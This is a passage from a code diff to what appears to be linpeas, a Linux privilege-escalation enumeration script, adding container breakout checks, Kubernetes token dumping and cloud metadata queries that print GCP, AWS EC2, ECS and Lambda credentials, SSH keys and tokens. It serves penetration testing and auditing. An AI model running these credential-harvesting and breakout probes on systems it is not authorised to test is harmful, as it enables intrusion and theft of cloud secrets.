2>/dev/null || echo No)" + sched_debug_readable="$( (head -n 1 /proc/sched_debug > /dev/null && echo Yes) 2>/dev/null || echo No)" + mountinfo_readable="$( (head -n 1 /proc/*/mountinfo > /dev/null && echo Yes) 2>/dev/null || echo No)" + uevent_helper_breakout="$( (echo -n '' > /sys/kernel/uevent_helper && echo Yes) 2>/dev/null || echo No)" + vmcoreinfo_readable="$( (head -n 1 /sys/kernel/vmcoreinfo > /dev/null && echo Yes) 2>/dev/null || echo No)" + security_present="$( (ls -l /sys/kernel/security > /dev/null && echo Yes) 2>/dev/null || echo No)" + security_writable="$( (echo -n '' > /sys/kernel/security/a && echo Yes) 2>/dev/null || echo No)" + efi_vars_writable="$( (echo -n '' > /sys/firmware/efi/vars && echo Yes) 2>/dev/null || echo No)" + efi_efivars_writable="$( (echo -n '' > /sys/firmware/efi/efivars && echo Yes) 2>/dev/null || echo No)" +} + ############################################## #---------------) Containers (---------------# @@ -1535,6 +1767,9 @@ command -v kubectl command -v podman command -v runc +print_2title "Am I Containered?" +execBin "AmIContainered" "https://github.com/genuinetools/amicontained" "$FAT_LINPEAS_AMICONTAINED" + print_2title "Container details" print_list "Is this a container? ...........$NC $containerType" @@ -1575,6 +1810,7 @@ if echo "$containerType" | grep -qi "docker"; then if [ "$inContainer" ]; then checkDockerRootless print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," + echo "" fi if df -h | grep docker; then print_2title "Docker Overlays" @@ -1582,35 +1818,117 @@ if echo "$containerType" | grep -qi "docker"; then fi fi +#If token secrets mounted +if [ "$(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p')" ]; then + print_2title "Listing mounted tokens" + print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod" + ALREADY="IinItialVaaluE" + for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do + TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/')) + if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then + ALREADY="$ALREADY|$TOKEN" + echo "Directory: $i" + echo "Namespace: $(cat $i)" + echo "" + echo $TOKEN + echo "================================================================================" + echo "" + fi + done +fi + if [ "$inContainer" ]; then echo "" print_2title "Container & breakout enumeration" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout" print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')" if echo "$containerType" | grep -qi "docker"; then print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" fi + print_list "Seccomp enabled? ............... "$NC + ([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," + + print_list "AppArmor profile? .............. "$NC + (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN}," + + print_list "User proc namespace? ........... "$NC + if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi checkContainerExploits - print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," + + print_3title "Breakout via mounts" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts" + + checkProcSysBreakouts + print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED}," + print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,/Yes,${SED_RED}," + if [ "$EXTRA_CHECKS" ]; then + print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,/Yes,${SED_RED}," + fi + + echo "" + print_3title "Namespaces" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/namespaces" + ls -l /proc/self/ns/ if echo "$containerType" | grep -qi "kubernetes"; then print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" - print_2title "Kubernetes Information" echo "" + print_2title "Kubernetes Information" + print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod" + + print_3title "Kubernetes service account folder" ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null echo "" print_3title "Kubernetes env vars" - (env | set) | grep -Ei "kubernetes|kube" + (env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType=" + echo "" + + print_3title "Current sa user k8s permissions" + print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/hardening-roles-clusterroles" + kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \ + "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \ + -X 'POST' -H 'Content-Type: application/json' \ + --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED}," + fi echo "" print_2title "Container Capabilities" - capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape" + if [ "$(command -v capsh)" ]; then + capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" + else + cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g" + fi echo "" print_2title "Privilege Mode" @@ -1626,13 +1944,299 @@ if [ "$inContainer" ]; then echo "" print_2title "Interesting Files Mounted" - (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," + (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g" echo "" print_2title "Possible Entrypoints" ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq echo "" fi + +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q cloud; then +print_title "Cloud" +########################################### +#-----------) Cloud functions (-----------# +########################################### + +GCP_GOOD_SCOPES="/devstorage.read_only|/logging.write|/monitoring|/servicecontrol|/service.management.readonly|/trace.append" +GCP_BAD_SCOPES="/cloud-platform|/compute" + +exec_with_jq(){ + if [ "$(command -v jq)" ]; then + $@ | jq; + else + $@; + fi +} + +check_gcp(){ + is_gcp="No" + if grep -q metadata.google.internal /etc/hosts 2>/dev/null || (curl --connect-timeout 2 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]); then + is_gcp="Yes" + fi +} + +check_aws_ecs(){ + is_aws_ecs="No" + if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then + is_aws_ecs="Yes"; + aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI_v4; + aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" + + elif (env | grep -q ECS_CONTAINER_METADATA_URI); then + is_aws_ecs="Yes"; + aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI; + aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" + + elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then + is_aws_ecs="Yes"; + + + elif (curl --connect-timeout 2 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]); then + is_aws_ecs="Yes"; + + fi + + if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then + aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" + fi +} + +check_aws_ec2(){ + is_aws_ec2="No" + + if [ -d "/var/log/amazon/" ]; then + is_aws_ec2="Yes" + EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null) + + else + EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null) + if [ "$(echo $EC2_TOKEN | cut -c1-2)" = "AQ" ]; then + is_aws_ec2="Yes" + fi + fi +} + +check_aws_lambda(){ + is_aws_lambda="No" + + if (env | grep -q AWS_LAMBDA_); then + is_aws_lambda="Yes" + fi +} + + +check_gcp +print_list "Google Cloud Platform? ............... $is_gcp\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_aws_ecs +print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_aws_ec2 +print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_aws_lambda +print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," + +echo "" + +if [ "$is_gcp" = "Yes" ]; then + gcp_req="" + if [ "$(command -v curl)" ]; then + gcp_req='curl -s -f -H "X-Google-Metadata-Request: True"' + elif [ "$(command -v wget)" ]; then + gcp_req='wget -q -O - --header "X-Google-Metadata-Request: True"' + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + + if [ "$gcp_req" ]; then + print_2title "Google CLoud Platform Enumeration" + print_info "https://book.hacktricks.xyz/cloud-security/gcp-security" + + ## GC Project Info + p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id') + [ "$p_id" ] && echo "Project-ID: $p_id" + p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id') + [ "$p_num" ] && echo "Project Number: $p_num" + pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys') + [ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k" + p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true') + [ "$p_attrs" ] && echo "All Project Attributes: $p_attrs" + + # OSLogin Info + osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users) + [ "$osl_u" ] && echo "OSLogin users: $osl_u" + osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups) + [ "$osl_g" ] && echo "OSLogin Groups: $osl_g" + osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys) + [ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk" + osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize) + [ "$osl_au" ] && echo "OSLogin Authorize: $osl_au" + + # Instance Info + inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description) + [ "$inst_d" ] && echo "Instance Description: " + inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname) + [ "$inst_hostn" ] && echo "Hostname: $inst_hostn" + inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id) + [ "$inst_id" ] && echo "Instance ID: $inst_id" + inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image) + [ "$inst_img" ] && echo "Instance Image: $inst_img" + inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type) + [ "$inst_mt" ] && echo "Machine Type: $inst_mt" + inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name) + [ "$inst_n" ] && echo "Instance Name: $inst_n" + inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags) + [ "$inst_tag" ] && echo "Instance tags: $inst_tag" + inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone) + [ "$inst_zone" ] && echo "Zone: $inst_zone" + + inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location") + [ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc" + inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name") + [ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name" + inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin") + [ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e" + inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels") + [ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab" + inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig") + [ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec" + inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env") + [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv" + + echo "" + print_3title "Interfaces" + for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do + echo " IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip") + echo " Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask") + echo " Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway") + echo " DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers") + echo " Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network") + echo " ============== " + done + + echo "" + print_3title "Service Accounts" + for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do + echo " Name: $sa" + echo " Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email") + echo " Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases") + echo " Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity") + echo " Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g" + echo " Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token") + echo " ============== " + done + fi +fi + + +if [ "$is_aws_ecs" = "Yes" ]; then + print_2title "AWS ECS Enumeration" + + aws_ecs_req="" + if [ "$(command -v curl)" ]; then + aws_ecs_req='curl -s -f' + elif [ "$(command -v wget)" ]; then + aws_ecs_req='wget -q -O -' + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + if [ "$aws_ecs_metadata_uri" ]; then + print_3title "Container Info" + exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri" + echo "" + + print_3title "Task Info" + exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task" + echo "" + else + echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info" + fi + + if [ "$aws_ecs_service_account_uri" ]; then + print_3title "IAM Role" + exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri" + echo "" + else + echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)" + fi +fi + +if [ "$is_aws_ec2" = "Yes" ]; then + print_2title "AWS EC2 Enumeration" + + HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN" + URL="http://169.254.169.254/latest/meta-data" + + aws_req="" + if [ "$(command -v curl)" ]; then + aws_req="curl -s -f -H '$HEADER'" + elif [ "$(command -v wget)" ]; then + aws_req="wget -q -O - -H '$HEADER'" + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + if [ "$aws_req" ]; then + printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo "" + printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo "" + printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo "" + printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo "" + printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo "" + printf "region: "; eval $aws_req "$URL/placement/region"; echo "" + + echo "" + print_3title "Account Info" + exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo "" + + echo "" + print_3title "Network Info" + for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do + echo "Mac: $mac" + printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo "" + printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo "" + printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo "" + echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo "" + printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo "" + echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo "" + printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo "" + echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo "" + echo "" + done + + echo "" + print_3title "IAM Role" + exec_with_jq eval $aws_req "$URL/iam/info"; echo "" + for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do + echo "Role: $role" + exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo "" + echo "" + done + + echo "" + print_3title "User Data" + eval $aws_req "http://169.254.169.254/latest/user-data" + fi +fi + +if [ "$is_aws_lambda" = "Yes" ]; then + print_2title "AWS Lambda Enumeration" + printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME + printf "Region: "; env | grep AWS_REGION + printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY + printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID + printf "Session token: "; env | grep AWS_SESSION_TOKEN + printf "Security token: "; env | grep AWS_SECURITY_TOKEN + printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API + printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next") +fi + + fi echo '' echo '' @@ -1645,146 +2249,167 @@ print_title "Processes, Crons, Timers, Services and Sockets" #-----) Processes & Cron & Services & Timers (-----# #################################################### -#-- PCS) Cleaned proccesses -print_2title "Cleaned processes" -if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC -fi -print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Cleaned proccesses + print_2title "Cleaned processes" + if [ "$NOUSEPS" ]; then + printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC + fi + print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes" -if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) -else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + if [ "$NOUSEPS" ]; then + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + pslist=$(print_ps) + else + (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi fi - fi - done - pslist=$(ps auxwww) - echo "" + done + pslist=$(ps auxwww) + echo "" - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions (non 'root root' and not belonging to current user)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," + #-- PCS) Binary processes permissions + print_2title "Binary processes permissions (non 'root root' and not belonging to current user)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes" + binW="IniTialiZZinnggg" + ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi + done + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | 